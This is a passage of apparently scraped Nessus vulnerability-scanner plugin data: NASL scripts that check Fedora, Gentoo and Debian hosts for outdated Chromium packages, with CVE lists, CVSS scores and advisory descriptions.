audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"chromium-79.0.3945.117-1.fc30\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:07:54", "description": "The remote host is affected by the vulnerability described in GLSA-202003-08 (Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the referenced CVE identifiers and Google Chrome Releases for details.\n Impact :\n\n A remote attacker could execute arbitrary code, escalate privileges, obtain sensitive information, spoof an URL or cause a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-13T00:00:00", "type": "nessus", "title": "GLSA-202003-08 : Chromium, Google Chrome: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13723", "CVE-2019-13724", "CVE-2019-13725", "CVE-2019-13726", "CVE-2019-13727", "CVE-2019-13728", "CVE-2019-13729", "CVE-2019-13730", "CVE-2019-13732", "CVE-2019-13734", "CVE-2019-13735", "CVE-2019-13736", "CVE-2019-13737", "CVE-2019-13738", "CVE-2019-13739", "CVE-2019-13740", "CVE-2019-13741", "CVE-2019-13742", "CVE-2019-13743", "CVE-2019-13744", "CVE-2019-13745", "CVE-2019-13746", "CVE-2019-13747", "CVE-2019-13748", "CVE-2019-13749", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-13754", "CVE-2019-13755", "CVE-2019-13756", "CVE-2019-13757", "CVE-2019-13758", "CVE-2019-13759", "CVE-2019-13761", "CVE-2019-13762", "CVE-2019-13763", "CVE-2019-13764", "CVE-2019-13767", "CVE-2020-6377", "CVE-2020-6378", "CVE-2020-6379", "CVE-2020-6380", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6385", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6418", "CVE-2020-6420"], "modified": "2022-12-07T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "p-cpe:/a:gentoo:linux:google-chrome", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202003-08.NASL", "href": "https://www.tenable.com/plugins/nessus/134475", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202003-08.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134475);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2019-13723\", \"CVE-2019-13724\", \"CVE-2019-13725\", \"CVE-2019-13726\", \"CVE-2019-13727\", \"CVE-2019-13728\", \"CVE-2019-13729\", \"CVE-2019-13730\", \"CVE-2019-13732\", \"CVE-2019-13734\", \"CVE-2019-13735\", \"CVE-2019-13736\", \"CVE-2019-13737\", \"CVE-2019-13738\", \"CVE-2019-13739\", \"CVE-2019-13740\", \"CVE-2019-13741\", \"CVE-2019-13742\", \"CVE-2019-13743\", \"CVE-2019-13744\", \"CVE-2019-13745\", \"CVE-2019-13746\", \"CVE-2019-13747\", \"CVE-2019-13748\", \"CVE-2019-13749\", \"CVE-2019-13750\", \"CVE-2019-13751\", \"CVE-2019-13752\", \"CVE-2019-13753\", \"CVE-2019-13754\", \"CVE-2019-13755\", \"CVE-2019-13756\", \"CVE-2019-13757\", \"CVE-2019-13758\", \"CVE-2019-13759\", \"CVE-2019-13761\", \"CVE-2019-13762\", \"CVE-2019-13763\", \"CVE-2019-13764\", \"CVE-2019-13767\", \"CVE-2020-6377\", \"CVE-2020-6378\", \"CVE-2020-6379\", \"CVE-2020-6380\", \"CVE-2020-6381\", \"CVE-2020-6382\", \"CVE-2020-6385\", \"CVE-2020-6387\", \"CVE-2020-6388\", \"CVE-2020-6389\", \"CVE-2020-6390\", \"CVE-2020-6391\", \"CVE-2020-6392\", \"CVE-2020-6393\", \"CVE-2020-6394\", \"CVE-2020-6395\", \"CVE-2020-6396\", \"CVE-2020-6397\", \"CVE-2020-6398\", \"CVE-2020-6399\", \"CVE-2020-6400\", \"CVE-2020-6401\", \"CVE-2020-6402\", \"CVE-2020-6403\", \"CVE-2020-6404\", \"CVE-2020-6406\", \"CVE-2020-6407\", \"CVE-2020-6408\", \"CVE-2020-6409\", \"CVE-2020-6410\", \"CVE-2020-6411\", \"CVE-2020-6412\", \"CVE-2020-6413\", \"CVE-2020-6414\", \"CVE-2020-6415\", \"CVE-2020-6416\", \"CVE-2020-6418\", \"CVE-2020-6420\");\n script_xref(name:\"GLSA\", value:\"202003-08\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"GLSA-202003-08 : Chromium, Google Chrome: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202003-08\n(Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the referenced CVE identifiers and Google Chrome\n Releases for details.\n \nImpact :\n\n A remote attacker could execute arbitrary code, escalate privileges,\n obtain sensitive information, spoof an URL or cause a Denial of Service\n condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202003-08\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-80.0.3987.132'\n All Google Chrome users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/google-chrome-80.0.3987.132'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:google-chrome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 80.0.3987.132\"), vulnerable:make_list(\"lt 80.0.3987.132\"))) flag++;\nif (qpkg_check(package:\"www-client/google-chrome\", unaffected:make_list(\"ge 80.0.3987.132\"), vulnerable:make_list(\"lt 80.0.3987.132\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium / Google Chrome\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:05:53", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2019-13725 Gengming Liu and Jianyu Chen discovered a use-after-free issue in the bluetooth implementation.\n\n - CVE-2019-13726 Sergei Glazunov discovered a buffer overflow issue.\n\n - CVE-2019-13727 @piochu discovered a policy enforcement error.\n\n - CVE-2019-13728 Rong Jian and Guang Gong discovered an out-of-bounds write error in the v8 JavaScript library.\n\n - CVE-2019-13729 Zhe Jin discovered a use-after-free issue.\n\n - CVE-2019-13730 Soyeon Park and Wen Xu discovered the use of a wrong type in the v8 JavaScript library.\n\n - CVE-2019-13732 Sergei Glazunov discovered a use-after-free issue in the WebAudio implementation.\n\n - CVE-2019-13734 Wenxiang Qian discovered an out-of-bounds write issue in the sqlite library.\n\n - CVE-2019-13735 Gengming Liu and Zhen Feng discovered an out-of-bounds write issue in the v8 JavaScript library.\n\n - CVE-2019-13736 An integer overflow issue was discovered in the pdfium library.\n\n - CVE-2019-13737 Mark Amery discovered a policy enforcement error.\n\n - CVE-2019-13738 Johnathan Norman and Daniel Clark discovered a policy enforcement error.\n\n - CVE-2019-13739 xisigr discovered a user interface error.\n\n - CVE-2019-13740 Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13741 Michal Bentkowski discovered that user input could be incompletely validated.\n\n - CVE-2019-13742 Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13743 Zhiyang Zeng discovered a user interface error.\n\n - CVE-2019-13744 Prakash discovered a policy enforcement error.\n\n - CVE-2019-13745 Luan Herrera discovered a policy enforcement error.\n\n - CVE-2019-13746 David Erceg discovered a policy enforcement error.\n\n - CVE-2019-13747 Ivan Popelyshev and Andre Bonatti discovered an uninitialized value.\n\n - CVE-2019-13748 David Erceg discovered a policy enforcement error.\n\n - CVE-2019-13749 Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13750 Wenxiang Qian discovered insufficient validation of data in the sqlite library.\n\n - CVE-2019-13751 Wenxiang Qian discovered an uninitialized value in the sqlite library.\n\n - CVE-2019-13752 Wenxiang Qian discovered an out-of-bounds read issue in the sqlite library.\n\n - CVE-2019-13753 Wenxiang Qian discovered an out-of-bounds read issue in the sqlite library.\n\n - CVE-2019-13754 Cody Crews discovered a policy enforcement error.\n\n - CVE-2019-13755 Masato Kinugawa discovered a policy enforcement error.\n\n - CVE-2019-13756 Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13757 Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13758 Khalil Zhani discovered a policy enforecement error.\n\n - CVE-2019-13759 Wenxu Wu discovered a user interface error.\n\n - CVE-2019-13761 Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13762 csanuragjain discovered a policy enforecement error.\n\n - CVE-2019-13763 weiwangpp93 discovered a policy enforecement error.\n\n - CVE-2019-13764 Soyeon Park and Wen Xu discovered the use of a wrong type in the v8 JavaScript library.\n\n - CVE-2019-13767 Sergei Glazunov discovered a use-after-free issue.\n\n - CVE-2020-6377 Zhe Jin discovered a use-after-free issue.\n\n - CVE-2020-6378 Antti Levomaki and Christian Jalio discovered a use-after-free issue.\n\n - CVE-2020-6379 Guang Gong discovered a use-after-free issue.\n\n - CVE-2020-6380 Sergei Glazunov discovered an error verifying extension messages.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-01-21T00:00:00", "type": "nessus", "title": "Debian DSA-4606-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13725", "CVE-2019-13726", "CVE-2019-13727", "CVE-2019-13728", "CVE-2019-13729", "CVE-2019-13730", "CVE-2019-13732", "CVE-2019-13734", "CVE-2019-13735", "CVE-2019-13736", "CVE-2019-13737", "CVE-2019-13738", "CVE-2019-13739", "CVE-2019-13740", "CVE-2019-13741", "CVE-2019-13742", "CVE-2019-13743", "CVE-2019-13744", "CVE-2019-13745", "CVE-2019-13746", "CVE-2019-13747", "CVE-2019-13748", "CVE-2019-13749", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-13754", "CVE-2019-13755", "CVE-2019-13756", "CVE-2019-13757", "CVE-2019-13758", "CVE-2019-13759", "CVE-2019-13761", "CVE-2019-13762", "CVE-2019-13763", "CVE-2019-13764", "CVE-2019-13767", "CVE-2020-6377", "CVE-2020-6378", "CVE-2020-6379", "CVE-2020-6380"], "modified": "2020-03-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4606.NASL", "href": "https://www.tenable.com/plugins/nessus/133109", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4606. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133109);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/02\");\n\n script_cve_id(\"CVE-2019-13725\", \"CVE-2019-13726\", \"CVE-2019-13727\", \"CVE-2019-13728\", \"CVE-2019-13729\", \"CVE-2019-13730\", \"CVE-2019-13732\", \"CVE-2019-13734\", \"CVE-2019-13735\", \"CVE-2019-13736\", \"CVE-2019-13737\", \"CVE-2019-13738\", \"CVE-2019-13739\", \"CVE-2019-13740\", \"CVE-2019-13741\", \"CVE-2019-13742\", \"CVE-2019-13743\", \"CVE-2019-13744\", \"CVE-2019-13745\", \"CVE-2019-13746\", \"CVE-2019-13747\", \"CVE-2019-13748\", \"CVE-2019-13749\", \"CVE-2019-13750\", \"CVE-2019-13751\", \"CVE-2019-13752\", \"CVE-2019-13753\", \"CVE-2019-13754\", \"CVE-2019-13755\", \"CVE-2019-13756\", \"CVE-2019-13757\", \"CVE-2019-13758\", \"CVE-2019-13759\", \"CVE-2019-13761\", \"CVE-2019-13762\", \"CVE-2019-13763\", \"CVE-2019-13764\", \"CVE-2019-13767\", \"CVE-2020-6377\", \"CVE-2020-6378\", \"CVE-2020-6379\", \"CVE-2020-6380\");\n script_xref(name:\"DSA\", value:\"4606\");\n\n script_name(english:\"Debian DSA-4606-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2019-13725\n Gengming Liu and Jianyu Chen discovered a use-after-free\n issue in the bluetooth implementation.\n\n - CVE-2019-13726\n Sergei Glazunov discovered a buffer overflow issue.\n\n - CVE-2019-13727\n @piochu discovered a policy enforcement error.\n\n - CVE-2019-13728\n Rong Jian and Guang Gong discovered an out-of-bounds\n write error in the v8 JavaScript library.\n\n - CVE-2019-13729\n Zhe Jin discovered a use-after-free issue.\n\n - CVE-2019-13730\n Soyeon Park and Wen Xu discovered the use of a wrong\n type in the v8 JavaScript library.\n\n - CVE-2019-13732\n Sergei Glazunov discovered a use-after-free issue in the\n WebAudio implementation.\n\n - CVE-2019-13734\n Wenxiang Qian discovered an out-of-bounds write issue in\n the sqlite library.\n\n - CVE-2019-13735\n Gengming Liu and Zhen Feng discovered an out-of-bounds\n write issue in the v8 JavaScript library.\n\n - CVE-2019-13736\n An integer overflow issue was discovered in the pdfium\n library.\n\n - CVE-2019-13737\n Mark Amery discovered a policy enforcement error.\n\n - CVE-2019-13738\n Johnathan Norman and Daniel Clark discovered a policy\n enforcement error.\n\n - CVE-2019-13739\n xisigr discovered a user interface error.\n\n - CVE-2019-13740\n Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13741\n Michal Bentkowski discovered that user input could be\n incompletely validated.\n\n - CVE-2019-13742\n Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13743\n Zhiyang Zeng discovered a user interface error.\n\n - CVE-2019-13744\n Prakash discovered a policy enforcement error.\n\n - CVE-2019-13745\n Luan Herrera discovered a policy enforcement error.\n\n - CVE-2019-13746\n David Erceg discovered a policy enforcement error.\n\n - CVE-2019-13747\n Ivan Popelyshev and Andre Bonatti discovered an\n uninitialized value.\n\n - CVE-2019-13748\n David Erceg discovered a policy enforcement error.\n\n - CVE-2019-13749\n Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13750\n Wenxiang Qian discovered insufficient validation of data\n in the sqlite library.\n\n - CVE-2019-13751\n Wenxiang Qian discovered an uninitialized value in the\n sqlite library.\n\n - CVE-2019-13752\n Wenxiang Qian discovered an out-of-bounds read issue in\n the sqlite library.\n\n - CVE-2019-13753\n Wenxiang Qian discovered an out-of-bounds read issue in\n the sqlite library.\n\n - CVE-2019-13754\n Cody Crews discovered a policy enforcement error.\n\n - CVE-2019-13755\n Masato Kinugawa discovered a policy enforcement error.\n\n - CVE-2019-13756\n Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13757\n Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13758\n Khalil Zhani discovered a policy enforecement error.\n\n - CVE-2019-13759\n Wenxu Wu discovered a user interface error.\n\n - CVE-2019-13761\n Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13762\n csanuragjain discovered a policy enforecement error.\n\n - CVE-2019-13763\n weiwangpp93 discovered a policy enforecement error.\n\n - CVE-2019-13764\n Soyeon Park and Wen Xu discovered the use of a wrong\n type in the v8 JavaScript library.\n\n - CVE-2019-13767\n Sergei Glazunov discovered a use-after-free issue.\n\n - CVE-2020-6377\n Zhe Jin discovered a use-after-free issue.\n\n - CVE-2020-6378\n Antti Levomaki and Christian Jalio discovered a\n use-after-free issue.\n\n - CVE-2020-6379\n Guang Gong discovered a use-after-free issue.\n\n - CVE-2020-6380\n Sergei Glazunov discovered an error verifying extension\n messages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13725\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13727\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13728\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13729\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13732\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13736\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13739\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13740\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13741\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13742\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13743\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13744\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13745\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13746\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13747\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13748\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13749\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13750\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13751\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13753\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13754\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13756\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13757\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13758\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13759\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13761\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13763\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13764\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13767\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2020/dsa-4606\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chromium packages.\n\nFor the oldstable distribution (stretch), security support for\nchromium has been discontinued.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 79.0.3945.130-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 